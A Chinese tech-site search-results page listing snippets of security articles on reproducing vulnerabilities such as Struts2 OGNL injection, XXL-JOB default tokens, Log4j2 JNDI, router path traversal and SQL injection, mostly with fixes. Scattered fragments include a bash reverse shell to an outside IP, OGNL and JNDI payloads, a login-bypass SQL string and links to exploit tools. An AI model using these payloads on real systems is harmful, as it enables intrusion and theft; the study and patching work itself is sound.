首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏网络安全615

    漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞

    二,s2-045漏洞形成分析 CVE编号:CVE- 2017- 5638 POST请求发送数据 功能:获取WEB路径,任意命令执行,反弹shell和文件上传  首先,我们先对比一下修复前与修复后的版本 ,可使远程攻击者通过构造的OGNL表达式,执行任意代码 在TextParseUtil.java中找到return parser 发现在这调用了ognl的方法,这就是漏洞形成的原因  三,s2-045 漏洞复现 Struts2漏洞利用扫描工具及其环境 Structs2高危漏洞exp的扫描利用工具(2018) 链接:https://pan.baidu.com/s/1rOMjz-7xOYGyJdh4pdddCQ   提取码:aero  漏洞环境 链接:https://pan.baidu.com/s/1w7yAmprETRfPNiF5mJ8Rdg  提取码:5b1r   部署s2-045漏洞环境 .multipart/form-data   再运用漏洞检查工具检测出了        S2-045漏洞 

    3.5K20编辑于 2022-11-19
  • 来自专栏OneMoreThink的专栏

    漏洞实战(2):XXL-JOB默认密钥漏洞

    2、危害 攻击者可以对执行器所在的服务器进行任意命令执行,从而获得执行器所在服务器的权限。 /dev/tcp/10.58.81.108/4444 0>&1", 4、防御 修改accessToken的默认值,调度中心和执行器的值需保持一致,例如将accessToken修改为cGqJjTqH2VMB2R1 : sed -i 's/default_token/cGqJjTqH2VMB2R1/g' /usr/local/xxl-job-2.4.0/xxl-job-admin/src/main/resources /application.properties sed -i 's/default_token/cGqJjTqH2VMB2R1/g' /usr/local/xxl-job-2.4.0/xxl-job-executor-samples ,成功修复漏洞。

    4.7K10编辑于 2024-10-15
  • 来自专栏世荣的博客

    搭建漏洞环境-实战-2

    Web服务有个很有名的词: LAMP(1.Linux 2.Apache 3.Mysql 4.PHP) 比如一个网站的发帖留言功能,在网页提交,PHP将你的留言提交到数据库中,PHP登陆数据库调用你所有的留言 image.png 2.打开Apache服务 2.打开Apache服务 /etc/init.d/apache2 start /etc/init.d/apache2 status #使用start打开Apache 服务,顺便用status查看是否顺利打开 或者是这样也可以 cd /etc/apache2 systemctl restart apache2 systemctl status apache2 image.png image.png 2.运行php -v可以看到php是配置好的 image.png (注意:如果是7.3版本的mysql要改成mysqli,这里我们是7.4.5) 3.MySQL 1.同上Kali虚拟机中有 image.png 2.打开MySQL服务 2.打开MySQL服务 cd /etc systemctl start mysql systemctl status mysql 或者这种方式也可以: sudo

    47120编辑于 2022-03-18
  • 来自专栏Tommonkey

    Struct2系列漏洞

    “SSM”所代替,具体原因出来性能方面的提高,还要就是struct2的漏洞实在是太多,像国内BAT都被坑了一波,更别说ZF机关。 OGNL表达式 struct2系列漏洞最开始是使用的OGNL表达式造成非法调用,OGNL是Object Graphic Navigation Language(对象图导航语言)的缩写,他是一个开源项目。 表达式 靶场演示 声明:靶场与相关POC,EXP来源与vulhub s2-001远程代码执行漏洞 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value ()%7D 靶场演示 s2-015命令命令执行 漏洞产生于配置了 Action 通配符 *,并将其作为动态值时,解析时会将其内容执行 OGNL 表达式,例如: <package name="S<em>2</em>- OGNL表达式计算,导致远程命令执行<em>漏洞</em>。

    2K21编辑于 2023-03-20
  • 走进“乌云”教科书书里的漏洞(2)【负数支付漏洞】

    0x01 漏洞解析在常规的支付流程中,系统会对支付金额进行严格校验,以确保交易的合理性与安全性。然而,当支付系统在设计或编码过程中存在缺陷时,就可能出现允许用户将总价修改为负数并成功支付的情况。 黑客一旦发现这类漏洞,便可以通过篡改支付请求中的数据,将商品总价改为负数。这样一来,不仅能免费获取商品,甚至可能让商家倒贴钱,给商家带来巨大的经济损失。下图为乌云找到的漏洞。 0x02 漏洞复现本次使用靶场连接:http://www.loveli.com.cn:12531/点击购买物品,然后确认购买提示余额不足获取数据包修改为负数,发现钱包金额反向增长修改为负数-999,出现 flag0x03 漏洞修复方法前端与后端双重校验:前端需对用户输入的价格、数量等参数进行初步校验,限制参数的合理范围(如价格不能为负数、数量不能小于 1),但不能仅依赖前端校验。

    39810编辑于 2025-08-18
  • 来自专栏安恒信息

    解密:Struts2漏洞及其补丁漏洞“曝光”纪实

    这是自2013年Struts2(s2-016)命令执行漏洞大规模爆发之后,该服务时隔三年再次爆发大规模漏洞。该漏洞也是爆出的最严重安全漏洞。 在6月3日,安恒研究院对Struts2 S2-033漏洞分析发现:最新高危漏洞官方修复方案无效。 漏洞发生后,安恒信息通过第一时间对Apache发布Struts2 S2-033远程代码执行漏洞的修复方案经过安恒研究院研究人员的测试,确认该修复方案并不完整,依然会导致恶意攻击者对Struts2应用发起远程代码执行攻击 发现此次Struts2漏洞修复方案无效的就是安恒研究院技术高手“Nike.zheng”,此前4月份,就是他就曾向Apache官方提交了Struts2高危安全漏洞(CVE-2016-3081,S02-32 面对此次Struts2 S2-033漏洞修复方案并不完整,安恒信息安全工程师详实的记录下分析漏洞的情况,并给出了相应的防护方案:客户可以使用明鉴web应用弱点扫描器和网站安全监测平台在线更新策略来检测是否自身应用存在漏洞

    1.6K50发布于 2018-04-10
  • 来自专栏White OWL

    Struts2-061 漏洞复现

    s2-061 漏洞复现 0x00 漏洞简介 Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。 Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行 0x01 漏洞描述 Struts2 会对某些标签属性(比如 `id`,其他属性有待寻找) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 `%{x}` 且 `x` 的值用户可控时,用户再传入一个 S2-061是对S2-059沙盒进行的绕过。 脚本: 0x05 漏洞修复 避免对不受信任的用户输入使用强制OGNL评估,或/和升级到2.5.26版,可修复该漏洞。

    55510编辑于 2022-09-22
  • 来自专栏White OWL

    Struts2-059 漏洞复现

    0x00 漏洞简介 Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。 0x01 影响版本 Struts 2.0.0 - Struts 2.5.20 0x02 环境搭建 用vulhub搭建即可 docker-compos up -d 环境完成 0x03 漏洞复现 http kali的ip/端口 0>&1 需要编码 将编码完的bash替换到脚本里边,ip替换,需要脚本的右边公众号留言 脚本运行前先用nc 监听端口,bash编码的那个端口 0x04 修复意见 更新Struts2位最新版本 继续复现s2-061 小白一枚,大佬勿喷! 在漏洞复现的和挖洞中徘徊。

    40920编辑于 2022-09-22
  • 来自专栏yuancao博客

    任意文件包含漏洞(2)

    目录 windows系统 1.路径长度绕过 简介 2. .. /info.php 则后2../的作用一样,绕过路径(尽管. 攻击者可以利用这个漏洞绕过扩展名过滤 和00截断有同样效果的还有:? 而且在sess.php同目录下,已经生成了一个data2.php文件, ? 通过蚁剑连接data2.php文件 ? ,可以使用url编码绕过 / %2f . %2e 但是在进行编码的时候,发现.编码后还是.,而%2e解码后却成了.,不知道是啥原因 嗯学完这个知识点就去看url编码 ? ?

    1.7K42发布于 2020-08-25
  • 来自专栏安全漏洞环境学习

    Struts2-057漏洞复现

    zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: JSESSIONID=64576605D2AA6BD07160B7C9E6C1A7AA (#cr=#ct['com.opensymphony.xwork2.ActionContext.container']). (#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). 漏洞修复: 该漏洞在两种情况下存在,第一,当xml配置中未设置namespace 值,且上层动作配置(action(s) configurations)中未设置或使用通配符namespace值时,可能导致远程代码执行漏洞的发生 第二,使用未设置 value和action值的url标签,且上层动作配置中未设置或使用通配符namespace值 所以直接升级到最新版本中可以修复漏洞!

    75220发布于 2019-09-24
  • 来自专栏py+selenium

    逻辑漏洞之并发测试【2】

    Fiddler拦截,选择数据包,敲击键盘R,复制数据包  批量选择数据包,点击GO  则发现漏洞,可同时拆取多个福袋。

    61360发布于 2018-09-12
  • 来自专栏漏洞战争

    Bochspwn漏洞挖掘技术深究(2):未初始化漏洞检测

    本文主要介绍Bochspwn Reloaded(https://github.com/googleprojectzero/bochspwn-reloaded)内核未初始化漏洞检测技术,它采用污点追踪对内核层向用户层泄露数据的行为进行检测 关于bochs插桩技术参考《Bochspwn漏洞挖掘技术深究(1):Double Fetches 检测》,此处不再赘述。 case BX_IA_REP_MOVSB_YbXb: mult = 1; break; case BX_IA_REP_MOVSW_YwXw: mult = 2; 写操作:清除内存污点标记,标记为已初始化; 读操作:检测污点标记,如果shadow memory中标记为未初始化读取,则在guest memory中验证:标记不匹配则清除污点,否则若真为未初始化读取就当漏洞报告出来 pcpu, i, pcpu->prev_rip, src, size, dst, taint::get_origin(src + tainted_offset)); } 总结起来,是否为漏洞主要基于以下几点

    2.5K40发布于 2019-07-18
  • 来自专栏Java技术栈

    Apache Struts2 再现严重漏洞。。。

    ,以解决 Struts 2.0.0 到 2.5.29 版本中存在的一个远程代码执行漏洞;攻击者可以利用此漏洞来控制受影响的系统。 对此,美国网络安全和基础设施安全局 (CISA) 也发布公告敦促组织查看 Apache 的公告,并尽快升级到最新的 Struts 2 补丁版本。 该漏洞被跟踪为 CVE-2021-31805,是由于 2020 年 CVE-2020-17530 (S2-061) 的不完整修复造成的。 也就是说,这一漏洞早在 2020 年就已存在且当时被认为已修复,但事实证明问题并未完全得到解决。 它被集成在 Struts2 等框架中,作用是对数据进行访问;拥有类型转换、访问对象方法、操作集合对象等功能。

    1.2K30编辑于 2022-04-21
  • 来自专栏R0A1NG 技术分享

    Log4j2漏洞复现

    原理 由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限 https://mp.weixin.qq.com/s/15zcLEk6_x2enszhim9afA 影响版本 Apache Log4j 2.x <= 2.14.1 poc ${jndi:ldap://xxx.dnslog.cn rmi}://xxx.dnslog.cn/poc} RCE利用 靶机:http://192.168.223.129:8080/ 靶机搭建: 1.平台环境 http://vulfocus.fofa.so/ 2. 本地搭建 docker pull vulfocus/log4j2-rce-2021-12-09:latest docker run -d -p 8080:8080 vulfocus/log4j2-rce 升级最新版本 2. 设置jvm参数"-Dlog4j2.formatMsgNoLookups=true"; 3.

    2.3K30编辑于 2022-02-19
  • 来自专栏Khan安全团队

    Buffalo WSR-2533DHPL2 漏洞

    CVE-2021-20090 Buffalo WSR-2533DHPL2 - 路径遍历 Buffalo WSR-2533DHPL2 固件版本 <= 1.02 和 WSR-2533DHP3 固件版本 <= 1.24 的 Web 界面中的路径遍历漏洞可能允许未经身份验证的远程攻击者绕过身份验证。 CVE-2021-20092 Buffalo WSR-2533DHPL2 - 未授权访问 Buffalo WSR-2533DHPL2 固件版本 <= 1.02 和 WSR-2533DHP3 固件版本 - | GET /images/..%2fcgi/cgi_i_filter.js? 经过身份验证的远程攻击者可以利用此漏洞来更改设备配置,从而有可能获得远程代码执行。

    1.2K20发布于 2021-10-18
  • 来自专栏信安之路

    iOS12-2 越狱漏洞分析

    0x1 漏洞代码 void in6_pcbdetach(struct inpcb *inp) { // ... if (! = true; //这个时候in6p_outputopts就已经被我们释放掉了 int res = disconnectx(s_, 0, 0); return res == 0; } 0x2 f_fglob -> fg_data -> pipe -> pipe buffer 其中fake port的管道内核地址是为了构造kernel task,uaf pipe是为了释放掉它的buffer重新填充 2、 /* Destination options header (after a routing header) */ struct ip6_dest *ip6po_dest2;

    1.5K10发布于 2019-07-30
  • 来自专栏码农架构

    Apache Struts2 再现严重漏洞!

    Apache Software Foundation 发布了一个安全公告 S2-062,以解决 Struts 2.0.0 到 2.5.29 版本中存在的一个远程代码执行漏洞;攻击者可以利用此漏洞来控制受影响的系统 对此,美国网络安全和基础设施安全局 (CISA) 也发布公告敦促组织查看 Apache 的公告,并尽快升级到最新的 Struts 2 补丁版本。 该漏洞被跟踪为 CVE-2021-31805,是由于 2020 年 CVE-2020-17530 (S2-061) 的不完整修复造成的。 也就是说,这一漏洞早在 2020 年就已存在且当时被认为已修复,但事实证明问题并未完全得到解决。 它被集成在 Struts2 等框架中,作用是对数据进行访问;拥有类型转换、访问对象方法、操作集合对象等功能。

    80320编辑于 2022-06-28
  • 来自专栏Java技术栈

    HTTP2 最新漏洞,直指 Kubernetes!

    近日,Netflix、Google 及 CERT/CC 披露了 HTTP/2 相关的 8 个安全漏洞,就连用来打造 Kubernetes 的 Go 语言也受到其中两个漏洞的波及,导致 Kubernetes 不过好在现在漏洞已修复,而我们在这个过程中又可以学习到什么? 以下为译文: 几周前,Netflix公开了许多第三方HTTP/2实现中都存在的资源耗尽漏洞——由Jonathan Looney发现。 该漏洞会直接影响Kubernetes中的HTTP/2端点(由net/http、x/net/http2等GoLang库实现),还会影响到nginx等其他项目。甚至还有人为这个漏洞画了个标志。 ? 虽然人们对DoS的漏洞见怪不怪了,但我没有太多有关HTTP/2的经验,特别是在传输层,所以我决定利用这次机会深入了解HTTP/2的规范及其工作原理。 漏洞 下面让我们来看一看CVE-2019-9512和CVE-2019-9515,二者分别会利用PING和空SETTINGS帧发送大量消息到HTTP/2的监听进程。

    1.1K30发布于 2019-10-14
  • 来自专栏黑伞安全

    Struts2 连载系列:S2-001漏洞分析

    Why do this 关于Struts2漏洞出现到现在,网上很多大佬已经发表过分析此系列漏洞的优秀文章。这些文献足以为我们了解struts漏洞提供足够的参考。 本文是笔者第一次分析struts2相关漏洞,撰写本文时尽管参考了多位师傅[1]的文章,但难免还是会有说明不到位的情况,如有不妥之处还请大佬们多多斧正。 漏洞描述 此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。 在开启时,支持对标签中的 OGNL 表达式进行解析并执行[struts2标签解析主要依赖于xwork2,可以理解为xwork2的漏洞],攻击者通过使用 %{} 包裹恶意表达式的方式,将参数传递给应用程序 参考 【Struts2-命令-代码执行漏洞分析系列】S2-001 (https://xz.aliyun.com/t/2044#toc-1) S2-001漏洞分析 (https://www.cnblogs.com

    1.5K50发布于 2021-06-10
  • 来自专栏渗透测试专栏

    渗透测试SQL注入漏洞原理与验证(2)——SQL注入漏洞利用

    SQL注入概述 什么是SQL注入漏洞 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵 SQL注入漏洞原理 服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。 1 -- 进行万能密码登录 SELECT username, password FROM users WHERE username='输入值' or 1=1-- ' AND password='输入值2' ' ) ; 双引号( " ) SQL注入分类 按照注入点类型分类 数字型(整型)注入 字符型注入 搜索型注入 数字型(整型)注入 输入的参数为整数,如ID、年龄、页码等,如果存在注入型漏洞 text=value1&cat=value2&num=value3....

    2.1K20编辑于 2024-09-27
领券